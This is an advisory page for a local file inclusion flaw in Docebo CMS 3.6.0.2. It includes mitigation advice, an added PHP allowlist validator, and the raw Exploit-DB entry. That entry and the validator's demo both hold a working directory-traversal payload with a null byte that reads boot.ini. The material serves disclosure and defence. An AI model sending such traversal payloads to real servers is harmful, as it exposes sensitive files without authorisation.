Vendor: DoceboCms
Author: Zer0 Thunder
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 22
Product Name: DoceboCms
Affected Version From: 3.6.0.2
Affected Version To: 3.6.0.2
Patch Exists: NO
Related CWE: N/A
CPE: docebo:doceboCms:3.6.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp2
Year: 2010

Docebo 3.6.0.2 (stable) Local File Inclusion

Docebo 3.6.0.2 (stable) is vulnerable to Local File Inclusion through the modname parameter of index.php. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g. '../') to the vulnerable server. This can allow the attacker to read sensitive files from the server.

Mitigation:

To mitigate this vulnerability, the application should validate user input before it is used to build a file path and restrict access to sensitive files.
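
An added example of the input validation described above (not Docebo's code and not part of the original advisory): a hypothetical module loader that accepts a modname value only if it is a plain identifier, is on an allowlist, and resolves to a file inside the module directory. The function name, directory layout and module names are assumptions.

```php
<?php
// Added example, not Docebo's code: resolve_module(), the directory layout
// and the module names below are assumptions made for illustration.

/** Return the module file for $modname inside $baseDir, or null to refuse. */
function resolve_module($modname, string $baseDir, array $allowed): ?string
{
    // Array input (modname[]=x) or any other non-string is refused.
    if (!is_string($modname)) {
        return null;
    }
    // A module name is a plain identifier: no dots, slashes, backslashes,
    // percent signs or NUL bytes (the %00 in the advisory's sample).
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $modname)) {
        return null;
    }
    // Only modules the application actually ships may be loaded.
    if (!in_array($modname, $allowed, true)) {
        return null;
    }
    // Defence in depth: the resolved file must sit under the module directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $modname . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a throwaway module directory and sample modname values,
// including the traversal value from the advisory after URL decoding.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'modules_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'login.php', "<?php // stub\n");
$samples = ['login', "../../../../../../../boot.ini\0", '..\\..\\boot.ini', 'nosuch', ['x']];
foreach ($samples as $s) {
    $file = resolve_module($s, $dir, ['login']);
    echo json_encode($s, JSON_UNESCAPED_SLASHES), ' => ',
        $file === null ? 'refused' : 'load ' . basename($file), "\n";
}
unlink($dir . DIRECTORY_SEPARATOR . 'login.php');
rmdir($dir);
```

The caller should include only the path this function returns and treat null as a request to show an error page, never falling back to the raw parameter.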
Source

Exploit-DB raw data:

# Exploit Title: Docebo 3.6.0.2 (stable) Local File Inclusion 
# Date: 2010-01-06
# Author: Zer0 Thunder
# Site : http://www.docebolms.org/
# Software Link: http://www.docebolms.org/doceboCms/
# Version: 3.6.0.2
# Tested on: Windows XP sp2 [WampServer 2.0i] 
# CVE : 
# Code :

Exploit :
http://localhost/docebo/index.php?modname=[LFI]&op=lostpwd

Sample : ( Only Tested On Wamp 2.0i)
http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lostpwd


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################